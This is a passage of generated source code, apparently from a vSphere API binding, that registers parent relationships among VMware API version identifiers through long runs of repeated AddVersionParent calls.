AddVersionParent("vim.version.v7_0_3_1", "vmodl.version.version2")
AddVersionParent("vim.version.v7_0_3_1", "vim.version.v6_9_1")
AddVersionParent("vim.version.v7_0_3_1", "vim.version.v7_0_0_2")
AddVersionParent("vim.version.v7_0_3_1", "vim.version.v6_8_7")
AddVersionParent("vim.version.v7_0_3_1", "vmodl.reflect.version.version1")
AddVersionParent("vim.version.v7_0_3_1", "vmodl.reflect.version.version2")
AddVersionParent("vim.version.v7_0_3_1", "vim.version.v7_0_3_1")
AddVersionParent("vim.version.v7_0_3_1", "vim.version.v7_0_3_0")
AddVersionParent("vim.version.v7_0_3_1", "vim.version.version13")
AddVersionParent("vim.version.v7_0_3_1", "vim.version.version14")
AddVersionParent("vim.version.v7_0_3_1", "vim.version.version15")
AddVersionParent("vim.version.v7_0_3_1", "vim.version.version10")
AddVersionParent("vim.version.v7_0_3_1", "vim.version.version11")
AddVersionParent("vim.version.v7_0_3_1", "vim.version.version12")
AddVersionParent("vim.version.v7_0_3_1", "vim.version.v7_0_2_0")
AddVersionParent("vim.version.v7_0_3_1", "vim.version.v7_0_2_1")
AddVersionParent("vim.version.v7_0_3_1", "vim.version.v7_0_1_0")
AddVersionParent("vim.version.v7_0_3_1", "vim.version.v7_0")
AddVersionParent("vim.version.v7_0_3_1", "vim.version.version8")
AddVersionParent("vim.version.v7_0_3_1", "vim.version.version9")
AddVersionParent("vim.version.v7_0_3_1", "vim.version.version6")
AddVersionParent("vim.version.v7_0_3_1", "vim.version.version7")
AddVersionParent("vim.version.v7_0_3_1", "vim.version.version1")
AddVersionParent("vim.version.v7_0_3_1", "vim.version.version4")
AddVersionParent("vim.version.v7_0_3_1", "vim.version.version5")
AddVersionParent("vim.version.v7_0_3_1", "vim.version.version2")
AddVersionParent("vim.version.v7_0_3_1", "vim.version.version3")
AddVersionParent("vim.version.v7_0_3_2", "vmodl.query.version.version4")
AddVersionParent("vim.version.v7_0_3_2", "vmodl.query.version.version3")
AddVersionParent("vim.version.v7_0_3_2", "vmodl.query.version.version2")
AddVersionParent("vim.version.v7_0_3_2", "vmodl.query.version.version1")
AddVersionParent("vim.version.v7_0_3_2", "vim.version.v7_0_1_1")
AddVersionParent("vim.version.v7_0_3_2", "vmodl.version.version0")
AddVersionParent("vim.version.v7_0_3_2", "vmodl.version.version1")
AddVersionParent("vim.version.v7_0_3_2", "vmodl.version.version2")
AddVersionParent("vim.version.v7_0_3_2", "vim.version.v6_9_1")
AddVersionParent("vim.version.v7_0_3_2", "vim.version.v7_0_0_2")
AddVersionParent("vim.version.v7_0_3_2", "vim.version.v6_8_7")
AddVersionParent("vim.version.v7_0_3_2", "vmodl.reflect.version.version1")
AddVersionParent("vim.version.v7_0_3_2", "vmodl.reflect.version.version2")
AddVersionParent("vim.version.v7_0_3_2", "vim.version.v7_0_3_1")
AddVersionParent("vim.version.v7_0_3_2", "vim.version.v7_0_3_2")
AddVersionParent("vim.version.v7_0_3_2", "vim.version.v7_0_3_0")
AddVersionParent("vim.version.v7_0_3_2", "vim.version.version13")
AddVersionParent("vim.version.v7_0_3_2", "vim.version.version14")
AddVersionParent("vim.version.v7_0_3_2", "vim.version.version15")
AddVersionParent("vim.version.v7_0_3_2", "vim.version.version10")
AddVersionParent("vim.version.v7_0_3_2", "vim.version.version11")
AddVersionParent("vim.version.v7_0_3_2", "vim.version.version12")
AddVersionParent("vim.version.v7_0_3_2", "vim.version.v7_0_2_0")
AddVersionParent("vim.version.v7_0_3_2", "vim.version.v7_0_2_1")
AddVersionParent("vim.version.v7_0_3_2", "vim.version.v7_0_1_0")
AddVersionParent("vim.version.v7_0_3_2", "vim.version.v7_0")
AddVersionParent("vim.version.v7_0_3_2", "vim.version.version8")
AddVersionParent("vim.version.v7_0_3_2", "vim.version.version9")
AddVersionParent("vim.version.v7_0_3_2", "vim.version.version6")
AddVersionParent("vim.version.v7_0_3_2", "vim.version.version7")
AddVersionParent("vim.version.v7_0_3_2", "vim.version.version1")
AddVersionParent("vim.version.v7_0_3_2", "vim.version.version4")
AddVersionParent("vim.version.v7_0_3_2", "vim.version.version5")
AddVersionParent("vim.version.v7_0_3_2", "vim.version.version2")
AddVersionParent("vim.version.v7_0_3_2", "vim.version.version3")
AddVersionParent("vim.version.v7_0_3_0", "vmodl.query.version.version4")
AddVersionParent("vim.version.v7_0_3_0", "vmodl.query.version.version3")
AddVersionParent("vim.version.v7_0_3_0", "vmodl.query.version.version2")
AddVersionParent("vim.version.v7_0_3_0", "vmodl.query.version.version1")
AddVersionParent("vim.version.v7_0_3_0", "vim.version.v7_0_1_1")
AddVersionParent("vim.version.v7_0_3_0", "vmodl.version.version0")
AddVersionParent("vim.version.v7_0_3_0", "vmodl.version.version1")
AddVersionParent("vim.version.v7_0_3_0", "vmodl.version.version2")
AddVersionParent("vim.version.v7_0_3_0", "vim.version.v6_9_1")
AddVersionParent("vim.version.v7_0_3_0", "vim.version.v7_0_0_2")
AddVersionParent("vim.version.v7_0_3_0", "vim.version.v6_8_7")
AddVersionParent("vim.version.v7_0_3_0", "vmodl.reflect.version.version1")
AddVersionParent("vim.version.v7_0_3_0", "vmodl.reflect.version.version2")
AddVersionParent("vim.version.v7_0_3_0", "vim.version.v7_0_3_0")
AddVersionParent("vim.version.v7_0_3_0", "vim.version.version13")
AddVersionParent("vim.version.v7_0_3_0", "vim.version.version14")
AddVersionParent("vim.version.v7_0_3_0", "vim.version.version15")
AddVersionParent("vim.version.v7_0_3_0", "vim.version.version10")
AddVersionParent("vim.version.v7_0_3_0", "vim.version.version11")
AddVersionParent("vim.version.v7_0_3_0", "vim.version.version12")
AddVersionParent("vim.version.v7_0_3_0", "vim.version.v7_0_2_0")
AddVersionParent("vim.version.v7_0_3_0", "vim.version.v7_0_2_1")
AddVersionParent("vim.version.v7_0_3_0", "vim.version.v7_0_1_0")
AddVersionParent("vim.version.v7_0_3_0", "vim.version.v7_0")
AddVersionParent("vim.version.v7_0_3_0", "vim.version.version8")
AddVersionParent("vim.version.v7_0_3_0", "vim.version.version9")
AddVersionParent("vim.version.v7_0_3_0", "vim.version.version6")
AddVersionParent("vim.version.v7_0_3_0", "vim.version.version7")
AddVersionParent("vim.version.v7_0_3_0", "vim.version.version1")
AddVersionParent("vim.version.v7_0_3_0", "vim.version.version4")
AddVersionParent("vim.version.v7_0_3_0", "vim.version.version5")
AddVersionParent("vim.version.v7_0_3_0", "vim.version.version2")
AddVersionParent("vim.version.v7_0_3_0", "vim.version.version3")
AddVersionParent("vim.version.hwh", "vmodl.query.version.version4")
AddVersionParent("vim.version.hwh", "vmodl.query.version.version3")
AddVersionParent("vim.version.hwh", "vmodl.query.version.version2")
AddVersionParent("vim.version.hwh", "vmodl.query.version.version1")
AddVersionParent("vim.version.hwh", "vim.version.v7_0_1_1")
AddVersionParent("vim.version.hwh", "vmodl.version.version0")
AddVersionParent("vim.version.hwh", "vmodl.version.version1")
AddVersionParent("vim.version.hwh", "vmodl.version.version2")
AddVersionParent("vim.version.hwh", "vim.version.v6_9_1")
AddVersionParent("vim.version.hwh", "vim.version.v7_0_0_2")
AddVersionParent("vim.version.hwh", "vim.version.v6_8_7")
AddVersionParent("vim.version.hwh", "vmodl.reflect.version.version1")
AddVersionParent("vim.version.hwh", "vmodl.reflect.version.version2")
AddVersionParent("vim.version.hwh", "vim.version.v8_0_0_0")
AddVersionParent("vim.version.hwh", "vim.version.v7_0_3_1")
AddVersionParent("vim.version.hwh", "vim.version.v7_0_3_2")
AddVersionParent("vim.version.hwh", "vim.version.v7_0_3_0")
AddVersionParent("vim.version.hwh", "vim.version.hwh")
AddVersionParent("vim.version.hwh", "vim.version.version13")
AddVersionParent("vim.version.hwh", "vim.version.version14")
AddVersionParent("vim.version.hwh", "vim.version.version15")
AddVersionParent("vim.version.hwh", "vim.version.version10")
AddVersionParent("vim.version.hwh", "vim.version.version11")
AddVersionParent("vim.version.hwh", "vim.version.version12")
AddVersionParent("vim.version.hwh", "vim.version.v7_0_2_0")
AddVersionParent("vim.version.hwh", "vim.version.v7_0_2_1")
AddVersionParent("vim.version.hwh", "vim.version.v7_0_1_0")
AddVersionParent("vim.version.hwh", "vim.version.v7_0")
AddVersionParent("vim.version.hwh", "vim.version.version8")
AddVersionParent("vim.version.hwh", "vim.version.version9")
AddVersionParent("vim.version.hwh", "vim.version.version6")
AddVersionParent("vim.version.hwh", "vim.version.version7")
AddVersionParent("vim.version.hwh", "vim.version.version1")
AddVersionParent("vim.version.hwh", "vim.version.version4")
AddVersionParent("vim.version.hwh", "vim.version.version5")
AddVersionParent("vim.version.hwh", "vim.version.version2")
AddVersionParent("vim.version.hwh", "vim.version.version3")
AddVersionParent("vim.version.version13", "vmodl.query.version.version4")
AddVersionParent("vim.version.version13", "vmodl.query.version.version3")
AddVersionParent("vim.version.version13", "vmodl.query.version.version2")
AddVersionParent("vim.version.version13", "vmodl.query.version.version1")
AddVersionParent("vim.version.version13", "vmodl.version.version0")
AddVersionParent("vim.version.version13", "vmodl.version.version1")
AddVersionParent("vim.version.version13", "vmodl.version.version2")
AddVersionParent("vim.version.version13", "vmodl.reflect.version.version1")
AddVersionParent("vim.version.version13", "vmodl.reflect.version.version2")
AddVersionParent("vim.version.version13", "vim.version.version13")
AddVersionParent("vim.version.version13", "vim.version.version10")
AddVersionParent("vim.version.version13", "vim.version.version11")
AddVersionParent("vim.version.version13", "vim.version.version12")
AddVersionParent("vim.version.version13", "vim.version.version8")
AddVersionParent("vim.version.version13", "vim.version.version9")
AddVersionParent("vim.version.version13", "vim.version.version6")
AddVersionParent("vim.version.version13", "vim.version.version7")
AddVersionParent("vim.version.version13", "vim.version.version1")
AddVersionParent("vim.version.version13", "vim.version.version4")
AddVersionParent("vim.version.version13", "vim.version.version5")
AddVersionParent("vim.version.version13", "vim.version.version2")
AddVersionParent("vim.version.version13", "vim.version.version3")
AddVersionParent("vim.version.version14", "vmodl.query.version.version4")
AddVersionParent("vim.version.version14", "vmodl.query.version.version3")
AddVersionParent("vim.version.version14", "vmodl.query.version.version2")
AddVersionParent("vim.version.version14", "vmodl.query.version.version1")
AddVersionParent("vim.version.version14", "vmodl.version.version0")
AddVersionParent("vim.version.version14", "vmodl.version.version1")
AddVersionParent("vim.version.version14", "vmodl.version.version2")
AddVersionParent("vim.version.version14", "vmodl.reflect.version.version1")
AddVersionParent("vim.version.version14", "vmodl.reflect.version.version2")
AddVersionParent("vim.version.version14", "vim.version.version13")
AddVersionParent("vim.version.version14", "vim.version.version14")
AddVersionParent("vim.version.version14", "vim.version.version10")
AddVersionParent("vim.version.version14", "vim.version.version11")
AddVersionParent("vim.version.version14", "vim.version.version12")
AddVersionParent("vim.version.version14", "vim.version.version8")
AddVersionParent("vim.version.version14", "vim.version.version9")
AddVersionParent("vim.version.version14", "vim.version.version6")
AddVersionParent("vim.version.version14", "vim.version.version7")
AddVersionParent("vim.version.version14", "vim.version.version1")
AddVersionParent("vim.version.version14", "vim.version.version4")
AddVersionParent("vim.version.version14", "vim.version.version5")
AddVersionParent("vim.version.version14", "vim.version.version2")
AddVersionParent("vim.version.version14", "vim.version.version3")
AddVersionParent("vim.version.version15", "vmodl.query.version.version4")
AddVersionParent("vim.version.version15", "vmodl.query.version.version3")
AddVersionParent("vim.version.version15", "vmodl.query.version.version2")
AddVersionParent("vim.version.version15", "vmodl.query.version.version1")
AddVersionParent("vim.version.version15", "vmodl.version.version0")
AddVersionParent("vim.version.version15", "vmodl.version.version1")
AddVersionParent("vim.version.version15", "vmodl.version.version2")
AddVersionParent("vim.version.version15", "vmodl.reflect.version.version1")
AddVersionParent("vim.version.version15", "vmodl.reflect.version.version2")
AddVersionParent("vim.version.version15", "vim.version.version13")
AddVersionParent("vim.version.version15", "vim.version.version14")
AddVersionParent("vim.version.version15", "vim.version.version15")
AddVersionParent("vim.version.version15", "vim.version.version10")
AddVersionParent("vim.version.version15", "vim.version.version11")
AddVersionParent("vim.version.version15", "vim.version.version12")
AddVersionParent("vim.version.version15", "vim.version.version8")
AddVersionParent("vim.version.version15", "vim.version.version9")
AddVersionParent("vim.version.version15", "vim.version.version6")
AddVersionParent("vim.version.version15", "vim.version.version7")
AddVersionParent("vim.version.version15", "vim.version.version1")
AddVersionParent("vim.version.version15", "vim.version.version4")
AddVersionParent("vim.version.version15", "vim.version.version5")
AddVersionParent("vim.version.version15", "vim.version.version2")
AddVersionParent("vim.version.version15", "vim.version.version3")
AddVersionParent("dp.version.VSPHERE_DP_QUIESCED_SNAPSHOT", "vmodl.query.version.version4")
AddVersionParent("dp.version.VSPHERE_DP_QUIESCED_SNAPSHOT", "vmodl.query.version.version3")
AddVersionParent("dp.version.VSPHERE_DP_QUIESCED_SNAPSHOT", "vmodl.query.version.version2")
AddVersionParent("dp.version.VSPHERE_DP_QUIESCED_SNAPSHOT", "vmodl.query.version.version1")
AddVersionParent("dp.version.VSPHERE_DP_QUIESCED_SNAPSHOT", "vim.version.VSPHERE_DP_QUIESCED_SNAPSHOT")
AddVersionParent("dp.version.VSPHERE_DP_QUIESCED_SNAPSHOT", "vim.version.v7_0_1_1")
AddVersionParent("dp.version.VSPHERE_DP_QUIESCED_SNAPSHOT", "vmodl.version.version0")
AddVersionParent("dp.version.VSPHERE_DP_QUIESCED_SNAPSHOT", "vmodl.version.version1")
AddVersionParent("dp.version.VSPHERE_DP_QUIESCED_SNAPSHOT", "vmodl.version.version2")
AddVersionParent("dp.version.VSPHERE_DP_QUIESCED_SNAPSHOT", "dp.version.version1")
AddVersionParent("dp.version.VSPHERE_DP_QUIESCED_SNAPSHOT", "vim.version.v6_9_1")
AddVersionParent("dp.version.VSPHERE_DP_QUIESCED_SNAPSHOT", "vim.version.v7_0_0_2")
AddVersionParent("dp.version.VSPHERE_DP_QUIESCED_SNAPSHOT", "vim.version.v6_8_7")
AddVersionParent("dp.version.VSPHERE_DP_QUIESCED_SNAPSHOT", "vmodl.reflect.version.version1")
AddVersionParent("dp.version.VSPHERE_DP_QUIESCED_SNAPSHOT", "vmodl.reflect.version.version2")
AddVersionParent("dp.version.VSPHERE_DP_QUIESCED_SNAPSHOT", "vim.version.v8_0_0_0")
AddVersionParent("dp.version.VSPHERE_DP_QUIESCED_SNAPSHOT", "vim.version.v7_0_3_1")
AddVersionParent("dp.version.VSPHERE_DP_QUIESCED_SNAPSHOT", "vim.version.v7_0_3_2")
AddVersionParent("dp.version.VSPHERE_DP_QUIESCED_SNAPSHOT", "vim.version.v7_0_3_0")
AddVersionParent("dp.version.VSPHERE_DP_QUIESCED_SNAPSHOT", "vim.version.version13")
AddVersionParent("dp.version.VSPHERE_DP_QUIESCED_SNAPSHOT", "vim.version.version14")
AddVersionParent("dp.version.VSPHERE_DP_QUIESCED_SNAPSHOT", "vim.version.version15")
AddVersionParent("dp.version.VSPHERE_DP_QUIESCED_SNAPSHOT", "dp.version.VSPHERE_DP_QUIESCED_SNAPSHOT")
AddVersionParent("dp.version.VSPHERE_DP_QUIESCED_SNAPSHOT", "vim.version.version10")
AddVersionParent("dp.version.VSPHERE_DP_QUIESCED_SNAPSHOT", "vim.version.version11")
AddVersionParent("dp.version.VSPHERE_DP_QUIESCED_SNAPSHOT", "vim.version.version12")
AddVersionParent("dp.version.VSPHERE_DP_QUIESCED_SNAPSHOT", "vim.version.v7_0_2_0")
AddVersionParent("dp.version.VSPHERE_DP_QUIESCED_SNAPSHOT", "vim.version.v7_0_2_1")
AddVersionParent("dp.version.VSPHERE_DP_QUIESCED_SNAPSHOT", "vim.version.v7_0_1_0")
AddVersionParent("dp.version.VSPHERE_DP_QUIESCED_SNAPSHOT", "vim.version.v7_0")
AddVersionParent("dp.version.VSPHERE_DP_QUIESCED_SNAPSHOT", "vim.version.version8")
AddVersionParent("dp.version.VSPHERE_DP_QUIESCED_SNAPSHOT", "vim.version.version9")
AddVersionParent("dp.version.VSPHERE_DP_QUIESCED_SNAPSHOT", "vim.version.version6")
AddVersionParent("dp.version.VSPHERE_DP_QUIESCED_SNAPSHOT", "vim.version.version7")
AddVersionParent("dp.version.VSPHERE_DP_QUIESCED_SNAPSHOT", "vim.version.version1")
AddVersionParent("dp.version.VSPHERE_DP_QUIESCED_SNAPSHOT", "vim.version.version4")
AddVersionParent("dp.version.VSPHERE_DP_QUIESCED_SNAPSHOT", "vim.version.version5")
AddVersionParent("dp.version.VSPHERE_DP_QUIESCED_SNAPSHOT", "vim.version.version2")
AddVersionParent("dp.version.VSPHERE_DP_QUIESCED_SNAPSHOT", "vim.version.version3")
AddVersionParent("dp.version.VSPHERE_DP_QUIESCED_SNAPSHOT", "dp.version.v8_0_0_0")
AddVersionParent("vim.version.VSAN2_Configure", "vmodl.query.version.version4")
AddVersionParent("vim.version.VSAN2_Configure", "vmodl.query.version.version3")
AddVersionParent("vim.version.VSAN2_Configure", "vmodl.query.version.version2")
AddVersionParent("vim.version.VSAN2_Configure", "vmodl.query.version.version1")
AddVersionParent("vim.version.VSAN2_Configure", "vim.version.v7_0_1_1")
AddVersionParent("vim.version.VSAN2_Configure", "vmodl.version.version0")
AddVersionParent("vim.version.VSAN2_Configure", "vmodl.version.version1")
AddVersionParent("vim.version.VSAN2_Configure", "vmodl.version.version2")
AddVersionParent("vim.version.VSAN2_Configure", "vim.version.v6_9_1")
AddVersionParent("vim.version.VSAN2_Configure", "vim.version.v7_0_0_2")
AddVersionParent("vim.version.VSAN2_Configure", "vim.version.v6_8_7")
AddVersionParent("vim.version.VSAN2_Configure", "vmodl.reflect.version.version1")
AddVersionParent("vim.version.VSAN2_Configure", "vmodl.reflect.version.version2")
AddVersionParent("vim.version.VSAN2_Configure", "vim.version.v8_0_0_0")
AddVersionParent("vim.version.VSAN2_Configure", "vim.version.v7_0_3_1")
AddVersionParent("vim.version.VSAN2_Configure", "vim.version.v7_0_3_2")
AddVersionParent("vim.version.VSAN2_Configure", "vim.version.v7_0_3_0")
AddVersionParent("vim.version.VSAN2_Configure", "vim.version.version13")
AddVersionParent("vim.version.VSAN2_Configure", "vim.version.version14")
AddVersionParent("vim.version.VSAN2_Configure", "vim.version.version15")
AddVersionParent("vim.version.VSAN2_Configure", "vim.version.VSAN2_Configure")
AddVersionParent("vim.version.VSAN2_Configure", "vim.version.version10")
AddVersionParent("vim.version.VSAN2_Configure", "vim.version.version11")
AddVersionParent("vim.version.VSAN2_Configure", "vim.version.version12")
AddVersionParent("vim.version.VSAN2_Configure", "vim.version.v7_0_2_0")
AddVersionParent("vim.version.VSAN2_Configure", "vim.version.v7_0_2_1")
AddVersionParent("vim.version.VSAN2_Configure", "vim.version.v7_0_1_0")
AddVersionParent("vim.version.VSAN2_Configure", "vim.version.v7_0")
AddVersionParent("vim.version.VSAN2_Configure", "vim.version.version8")
AddVersionParent("vim.version.VSAN2_Configure", "vim.version.version9")
AddVersionParent("vim.version.VSAN2_Configure", "vim.version.version6")
AddVersionParent("vim.version.VSAN2_Configure", "vim.version.version7")
AddVersionParent("vim.version.VSAN2_Configure", "vim.version.version1")
AddVersionParent("vim.version.VSAN2_Configure", "vim.version.version4")
AddVersionParent("vim.version.VSAN2_Configure", "vim.version.version5")
AddVersionParent("vim.version.VSAN2_Configure", "vim.version.version2")
AddVersionParent("vim.version.VSAN2_Configure", "vim.version.version3")
AddVersionParent("vim.version.DRS_LB_REASONCODE", "vmodl.query.version.version4")
AddVersionParent("vim.version.DRS_LB_REASONCODE", "vmodl.query.version.version3")
AddVersionParent("vim.version.DRS_LB_REASONCODE", "vmodl.query.version.version2")
AddVersionParent("vim.version.DRS_LB_REASONCODE", "vmodl.query.version.version1")
AddVersionParent("vim.version.DRS_LB_REASONCODE", "vim.version.v7_0_1_1")
AddVersionParent("vim.version.DRS_LB_REASONCODE", "vmodl.version.version0")
AddVersionParent("vim.version.DRS_LB_REASONCODE", "vmodl.version.version1")
AddVersionParent("vim.version.DRS_LB_REASONCODE", "vmodl.version.version2")
AddVersionParent("vim.version.DRS_LB_REASONCODE", "vim.version.v6_9_1")
AddVersionParent("vim.version.DRS_LB_REASONCODE", "vim.version.v7_0_0_2")
AddVersionParent("vim.version.DRS_LB_REASONCODE", "vim.version.v6_8_7")
AddVersionParent("vim.version.DRS_LB_REASONCODE", "vmodl.reflect.version.version1")
AddVersionParent("vim.version.DRS_LB_REASONCODE", "vmodl.reflect.version.version2")
AddVersionParent("vim.version.DRS_LB_REASONCODE", "vim.version.v8_0_0_0")
AddVersionParent("vim.version.DRS_LB_REASONCODE", "vim.version.v7_0_3_1")
AddVersionParent("vim.version.DRS_LB_REASONCODE", "vim.version.v7_0_3_2")
AddVersionParent("vim.version.DRS_LB_REASONCODE", "vim.version.v7_0_3_0")
AddVersionParent("vim.version.DRS_LB_REASONCODE", "vim.version.version13")
AddVersionParent("vim.version.DRS_LB_REASONCODE", "vim.version.version14")
AddVersionParent("vim.version.DRS_LB_REASONCODE", "vim.version.version15")
AddVersionParent("vim.version.DRS_LB_REASONCODE", "vim.version.DRS_LB_REASONCODE")
AddVersionParent("vim.version.DRS_LB_REASONCODE", "vim.version.version10")
AddVersionParent("vim.version.DRS_LB_REASONCODE", "vim.version.version11")
AddVersionParent("vim.version.DRS_LB_REASONCODE", "vim.version.version12")
AddVersionParent("vim.version.DRS_LB_REASONCODE", "vim.version.v7_0_2_0")
AddVersionParent("vim.version.DRS_LB_REASONCODE", "vim.version.v7_0_2_1")
AddVersionParent("vim.version.DRS_LB_REASONCODE", "vim.version.v7_0_1_0")
AddVersionParent("vim.version.DRS_LB_REASONCODE", "vim.version.v7_0")
AddVersionParent("vim.version.DRS_LB_REASONCODE", "vim.version.version8")
AddVersionParent("vim.version.DRS_LB_REASONCODE", "vim.version.version9")
AddVersionParent("vim.version.DRS_LB_REASONCODE", "vim.version.version6")
AddVersionParent("vim.version.DRS_LB_REASONCODE", "vim.version.version7")
AddVersionParent("vim.version.DRS_LB_REASONCODE", "vim.version.version1")
AddVersionParent("vim.version.DRS_LB_REASONCODE", "vim.version.version4")
AddVersionParent("vim.version.DRS_LB_REASONCODE", "vim.version.version5")
AddVersionParent("vim.version.DRS_LB_REASONCODE", "vim.version.version2")
AddVersionParent("vim.version.DRS_LB_REASONCODE", "vim.version.version3")
AddVersionParent("vim.version.gosCrashRemediation", "vmodl.query.version.version4")
AddVersionParent("vim.version.gosCrashRemediation", "vmodl.query.version.version3")
AddVersionParent("vim.version.gosCrashRemediation", "vmodl.query.version.version2")
AddVersionParent("vim.version.gosCrashRemediation", "vmodl.query.version.version1")
AddVersionParent("vim.version.gosCrashRemediation", "vim.version.v7_0_1_1")
AddVersionParent("vim.version.gosCrashRemediation", "vmodl.version.version0")
AddVersionParent("vim.version.gosCrashRemediation", "vmodl.version.version1")
AddVersionParent("vim.version.gosCrashRemediation", "vmodl.version.version2")
AddVersionParent("vim.version.gosCrashRemediation", "vim.version.v6_9_1")
AddVersionParent("vim.version.gosCrashRemediation", "vim.version.v7_0_0_2")
AddVersionParent("vim.version.gosCrashRemediation", "vim.version.v6_8_7")
AddVersionParent("vim.version.gosCrashRemediation", "vmodl.reflect.version.version1")
AddVersionParent("vim.version.gosCrashRemediation", "vmodl.reflect.version.version2")
AddVersionParent("vim.version.gosCrashRemediation", "vim.version.v8_0_0_0")
AddVersionParent("vim.version.gosCrashRemediation", "vim.version.v7_0_3_1")
AddVersionParent("vim.version.gosCrashRemediation", "vim.version.v7_0_3_2")
AddVersionParent("vim.version.gosCrashRemediation", "vim.version.v7_0_3_0")
AddVersionParent("vim.version.gosCrashRemediation", "vim.version.version13")
AddVersionParent("vim.version.gosCrashRemediation", "vim.version.version14")
AddVersionParent("vim.version.gosCrashRemediation", "vim.version.version15")
AddVersionParent("vim.version.gosCrashRemediation", "vim.version.gosCrashRemediation")
AddVersionParent("vim.version.gosCrashRemediation", "vim.version.version10")
AddVersionParent("vim.version.gosCrashRemediation", "vim.version.version11")
AddVersionParent("vim.version.gosCrashRemediation", "vim.version.version12")
AddVersionParent("vim.version.gosCrashRemediation", "vim.version.v7_0_2_0")
AddVersionParent("vim.version.gosCrashRemediation", "vim.version.v7_0_2_1")
AddVersionParent("vim.version.gosCrashRemediation", "vim.version.v7_0_1_0")
AddVersionParent("vim.version.gosCrashRemediation", "vim.version.v7_0")
AddVersionParent("vim.version.gosCrashRemediation", "vim.version.version8")
AddVersionParent("vim.version.gosCrashRemediation", "vim.version.version9")
AddVersionParent("vim.version.gosCrashRemediation", "vim.version.version6")
AddVersionParent("vim.version.gosCrashRemediation", "vim.version.version7")
AddVersionParent("vim.version.gosCrashRemediation", "vim.version.version1")
AddVersionParent("vim.version.gosCrashRemediation", "vim.version.version4")
AddVersionParent("vim.version.gosCrashRemediation", "vim.version.version5")
AddVersionParent("vim.version.gosCrashRemediation", "vim.version.version2")
AddVersionParent("vim.version.gosCrashRemediation", "vim.version.version3")
AddVersionParent("vim.version.VCSOF_173", "vmodl.query.version.version4")
AddVersionParent("vim.version.VCSOF_173", "vmodl.query.version.version3")
AddVersionParent("vim.version.VCSOF_173", "vmodl.query.version.version2")
AddVersionParent("vim.version.VCSOF_173", "vmodl.query.version.version1")
AddVersionParent("vim.version.VCSOF_173", "vim.version.v7_0_1_1")
AddVersionParent("vim.version.VCSOF_173", "vmodl.version.version0")
AddVersionParent("vim.version.VCSOF_173", "vmodl.version.version1")
AddVersionParent("vim.version.VCSOF_173", "vmodl.version.version2")
AddVersionParent("vim.version.VCSOF_173", "vim.version.v6_9_1")
AddVersionParent("vim.version.VCSOF_173", "vim.version.v7_0_0_2")
AddVersionParent("vim.version.VCSOF_173", "vim.version.v6_8_7")
AddVersionParent("vim.version.VCSOF_173", "vmodl.reflect.version.version1")
AddVersionParent("vim.version.VCSOF_173", "vmodl.reflect.version.version2")
AddVersionParent("vim.version.VCSOF_173", "vim.version.v8_0_0_0")
AddVersionParent("vim.version.VCSOF_173", "vim.version.v7_0_3_1")
AddVersionParent("vim.version.VCSOF_173", "vim.version.v7_0_3_2")
AddVersionParent("vim.version.VCSOF_173", "vim.version.v7_0_3_0")
AddVersionParent("vim.version.VCSOF_173", "vim.version.version13")
AddVersionParent("vim.version.VCSOF_173", "vim.version.version14")
AddVersionParent("vim.version.VCSOF_173", "vim.version.version15")
AddVersionParent("vim.version.VCSOF_173", "vim.version.VCSOF_173")
AddVersionParent("vim.version.VCSOF_173", "vim.version.version10")
AddVersionParent("vim.version.VCSOF_173", "vim.version.version11")
AddVersionParent("vim.version.VCSOF_173", "vim.version.version12")
AddVersionParent("vim.version.VCSOF_173", "vim.version.v7_0_2_0")
AddVersionParent("vim.version.VCSOF_173", "vim.version.v7_0_2_1")
AddVersionParent("vim.version.VCSOF_173", "vim.version.v7_0_1_0")
AddVersionParent("vim.version.VCSOF_173", "vim.version.v7_0")
AddVersionParent("vim.version.VCSOF_173", "vim.version.version8")
AddVersionParent("vim.version.VCSOF_173", "vim.version.version9")
AddVersionParent("vim.version.VCSOF_173", "vim.version.version6")
AddVersionParent("vim.version.VCSOF_173", "vim.version.version7")
AddVersionParent("vim.version.VCSOF_173", "vim.version.version1")
AddVersionParent("vim.version.VCSOF_173", "vim.version.version4")
AddVersionParent("vim.version.VCSOF_173", "vim.version.version5")
AddVersionParent("vim.version.VCSOF_173", "vim.version.version2")
AddVersionParent("vim.version.VCSOF_173", "vim.version.version3")
AddVersionParent("vim.version.pciSriovExtendedID", "vmodl.query.version.version4")
AddVersionParent("vim.version.pciSriovExtendedID", "vmodl.query.version.version3")
AddVersionParent("vim.version.pciSriovExtendedID", "vmodl.query.version.version2")
AddVersionParent("vim.version.pciSriovExtendedID", "vmodl.query.version.version1")
AddVersionParent("vim.version.pciSriovExtendedID", "vim.version.v7_0_1_1")
AddVersionParent("vim.version.pciSriovExtendedID", "vmodl.version.version0")
AddVersionParent("vim.version.pciSriovExtendedID", "vmodl.version.version1")
AddVersionParent("vim.version.pciSriovExtendedID", "vmodl.version.version2")
AddVersionParent("vim.version.pciSriovExtendedID", "vim.version.v6_9_1")
AddVersionParent("vim.version.pciSriovExtendedID", "vim.version.v7_0_0_2")
AddVersionParent("vim.version.pciSriovExtendedID", "vim.version.v6_8_7")
AddVersionParent("vim.version.pciSriovExtendedID", "vmodl.reflect.version.version1")
AddVersionParent("vim.version.pciSriovExtendedID", "vmodl.reflect.version.version2")
AddVersionParent("vim.version.pciSriovExtendedID", "vim.version.v8_0_0_0")
AddVersionParent("vim.version.pciSriovExtendedID", "vim.version.v7_0_3_1")
AddVersionParent("vim.version.pciSriovExtendedID", "vim.version.v7_0_3_2")
AddVersionParent("vim.version.pciSriovExtendedID", "vim.version.v7_0_3_0")
AddVersionParent("vim.version.pciSriovExtendedID", "vim.version.version13")
AddVersionParent("vim.version.pciSriovExtendedID", "vim.version.version14")
AddVersionParent("vim.version.pciSriovExtendedID", "vim.version.version15")
AddVersionParent("vim.version.pciSriovExtendedID", "vim.version.pciSriovExtendedID")
AddVersionParent("vim.version.pciSriovExtendedID", "vim.version.version10")
AddVersionParent("vim.version.pciSriovExtendedID", "vim.version.version11")
AddVersionParent("vim.version.pciSriovExtendedID", "vim.version.version12")
AddVersionParent("vim.version.pciSriovExtendedID", "vim.version.v7_0_2_0")
AddVersionParent("vim.version.pciSriovExtendedID", "vim.version.v7_0_2_1")
AddVersionParent("vim.version.pciSriovExtendedID", "vim.version.v7_0_1_0")
AddVersionParent("vim.version.pciSriovExtendedID", "vim.version.v7_0")
AddVersionParent("vim.version.pciSriovExtendedID", "vim.version.version8")
AddVersionParent("vim.version.pciSriovExtendedID", "vim.version.version9")
AddVersionParent("vim.version.pciSriovExtendedID", "vim.version.version6")
AddVersionParent("vim.version.pciSriovExtendedID", "vim.version.version7")
AddVersionParent("vim.version.pciSriovExtendedID", "vim.version.version1")
